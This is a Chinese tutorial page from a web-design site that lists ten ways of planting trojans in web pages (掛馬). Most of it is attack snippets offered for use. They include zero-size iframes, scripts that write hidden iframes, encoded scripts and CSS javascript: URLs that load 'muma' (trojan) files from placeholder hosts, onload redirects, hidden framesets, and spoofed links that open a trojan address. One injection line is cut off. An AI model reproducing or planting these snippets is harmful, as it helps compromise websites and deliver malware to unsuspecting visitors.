DIV CSS 佈局教程網

 DIV+CSS佈局教程網 >> 網頁腳本 >> JavaScript入門知識 >> 關於JavaScript >> 網頁掛馬方式整理及詳細介紹
網頁掛馬方式整理及詳細介紹
編輯:關於JavaScript     

網頁掛馬方式

一:框架掛馬

    <iframe src=地址 width=0 height=0></iframe>

 二:js文件掛馬

  首先將以下代碼

  document.write("<iframe width='0' height='0' src='地址'></iframe>");

  保存為xxx.js,

  則JS掛馬代碼為

  <script language=javascript src=xxx.js></script>

 三:js變形加密

  <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

  muma.txt可改成任意後綴

四:body掛馬

  <body onload="window.location='地址';"></body>

 五:隱蔽掛馬

  top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src=";

六:css中掛馬

  body {
  background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

七:js掛馬

<SCRIPT language=javascript> 
  window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
  </script>

八:圖片偽裝

 <html>
  <iframe src="網馬地址" height=0 width=0></iframe>
  <img src="圖片地址"></center>
  </html>

九:偽裝調用:

<frameset rows="444,0" cols="*">
  <frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
  <frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
  </frameset>

十:高級欺騙

 <a href="http://www.163.com(迷惑連接地址,顯示這個地址指向木馬地址)" onMouseOver="www_163_com(); return true;"> 頁面要顯示的內容 </a>
  <SCRIPT Language="JavaScript">
  function www_163_com ()
  {
  var url="網馬地址";
  open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

感謝閱讀,希望能幫助到大家,謝謝大家對本站的支持!

XML學習教程| jQuery入門知識| AJAX入門| Dreamweaver教程| Fireworks入門知識| SEO技巧| SEO優化集錦|
Copyright © DIV+CSS佈局教程網 All Rights Reserved